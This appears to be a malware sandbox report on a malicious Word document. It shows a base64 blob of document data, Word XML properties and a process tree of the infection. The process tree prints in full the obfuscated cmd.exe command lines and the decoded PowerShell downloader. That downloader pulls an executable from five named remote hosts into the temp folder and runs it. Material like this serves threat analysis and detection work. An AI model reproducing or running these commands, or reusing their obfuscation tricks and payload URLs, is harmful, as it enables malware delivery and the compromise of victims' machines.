1bymn8tShZwHmea6WADvvm9QHgyAYCZbkpqr+7PVifCpMrRiaCuVYMJ1f+7uLlObLb+3VZKtFZ2K npupXcPF9rVpohScVFLcAcZES4ip7aZq3JmfBvWH86sNLXa3CWfgko31cLmSnN6sbIymfKNfj5V0 9scju6Qm2WBCa0usqPZYvtyiT1+9XVHO7Xvw1e4CUzz+6v9SWjVR233uuXDzyoklyRUv/CLzQ/WW Uyt0+fkVzSvGpOizym/D7HEfp7WdFn2rJu6bWC2CO2VBO/Zt9s60EpcOt3TpqtL7UzMuR8OtimyM LtuU5N7epQrmvx/kbtxeKDXPj4Zj/n5Z0Vckb1gWbgP/Klb2qro58UKHbv2/7p4FLI7q3NkHCcGQ LCGYZ3UlTSQRyDlzZs6ZicGwLEvIEwIm8ZEHCyxhgbALLJAmJkKTaH02Gq1Vax6+rY8SbW171RZ8 fG19FbVatVYTtbf11sZn1faq3P/MzrI/iJpHv+/23kMmO3PmPP7zn/91zvzzzyvdsw+GN2uP9Ebe yWvkOj00fv+dn0RMcfip/pXlaR/wcmVMtjCMnpQw09kF5EDKKaJJM808cWtd77y++dlaRrm6a84P mPpm5vs7lTxd3HRapSfaHwSxH2MzW+mluaywfGI503N7XefPJH7XDLLLsW96TUfLKn19dPNutnt6 Yai/M7eQNl24K5MWXZFXbXJ62ZLSmDC3zVRp7/gOV3lO98wzwYZsF3XknnVVGQ1GeVmvp/LghmYw 9HbldZ24+LRSzvVfBFTS1b5xMpi875+5f14jJX/7jIeVK1YsyVYm9OcUtg+0pvdsryohGVkTPdcW 7vRkRvyXrPD1l/Z0aK7c9zK1J0nu3/09JYIFybPum6pc6p5cRu7LUg85BR3loz2Zsd4ZVzB/kSIt 5s0q1d5wdE0Z16hrXmOfZ4YypjXbJP2ZDVRVW57J9BcH97u63GU5Da4qny/HXwnLippz371+66Zg dM/nTPMt6Dyhf98pAf+KtWEwkzd0j1m04N3UzfSNcsf08AV69ol3nNDAhUpqJ20/oVxh+fTdUbDE 4npLwXuLO6u+c9n6NvGw1tMBS2zef2nvHonnvROycgU989KYyM2cYvbvpfvKp7DPTeakc4tKPXNq 53a5exYOPDNlx7r+teUnbS8p3/qYNjM0pWdKvfrw/cH2asHmqek3be7fHZ31h3Sqjb9iSuGijPmH emo4M1peO8u70fCkRPNWXB6dbBqqw3NHZoyJX+1ZSDI9KzhX+xZ0uy4Pdn2HVq+ZUm2oE67cf+W0 Os7JUylNinPM8pOZWdhQpxLtg0M5GSs2qvtOyJ15sPTGbU9newOerKs3qbm9Suvare9PEip7vu3h zorgww71F9p7t/+kvYefooBSf9ZhPqtquYXOfUs+cBq5A72jXpiqOhy8dy+Qw94V2otcmL6Mm0jr wfSt+fdUF/5w15QnprJnZjcpS1jf1Na+Dv5ucUQLi5++O7d/6oG7Osvr07OCysk7y+bx/lNgEWI8 mxLsqu6EtXvLmLentp/IvNsfTYkdXlBHyePqXq9ByjpF76wW1xi1Xtdv8EZBW38WPDv7vbs91Lsk +rv3MwuvOlT4Xblbuu/5CY4MNtC6u3fJG49ceV+/4uflV5dP2dIypcrNM537Xukq2+WiC68qr5y2 3w0LkaopDfMFr5jfQvoX37CsRbuErD/cTr3RDsH3n32K68IGpvNIpjfyF10Qn9N/cHxXSd6UW1uU dy4PctqSqRfuPD2a2VLQuevMK1yzp7SwTwnrLsvw9ZwWLe4dm1E08FxHW+DRf1TN3XVLuVI0seq2 BUXkEZrt6HdUbG65LNur3HmvAqaKtUupJLYpU8F+UXbJXUqHwwPmSYsq7REwT6QAVFq4LgywTRRr WwZsE0Vuy9QwRkArp1m2CZhAYChHDGIyh9IqtXfQEDs0VWm1DJTNPmdtmyq4DgZKl5SUNYY2bq23 gTHQ4Gt1poB90kANUziUeZL5GzS1WCWetZTQUWsjkylVHd1jHqjVhJvyy/NV0FBNHlNV6Y78FkN3 U3ZpficsmfmKrvHZsJC9nir79P2uG+Re5Y49THGnOG/LVW61NihbVedoNVcZ1TXZfb/eZW9LurKc XHk0viPpnl377VRrNzLVu/wc5yi5Fdll70V2PeWpoUTtfgr0ZlVOGxOku+KiSGwXFbp5WYQL5XZP 0BRq9/qK5lqSA0rN0X5pXbuWahhqoSH3t6qAy2G9XfibEzsmg52gfOuJrUwlhelpQSrMvuUlCpg1 Qco13f/k8q6x9VQ1UvKbJ4OR1p2aNokbYue4OtYbinGd+bae0pcXNkzy1FU13KmDwWHtOKbOmhV2 LpMbjh654+h0eQ3aG99uLKxwut3z5nSdae00PvLwuV035jBttq+v8CzSqXOjr6e31OS+XrfUUWqv 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 VABPAE8AUABFAE4AAABAAAAL8AQAAAASNFZ4 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentDocPrViewVal: | |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 00200428 |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentBodySectPRsidRDefault: | 00200428 |
WordDocumentBodySectPRRsidRPr: | 0038126B |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05616586598.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4044 | c:\w4537\d5871\t6947\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2608 | CmD /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!|cmd" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2640 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2760 | cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
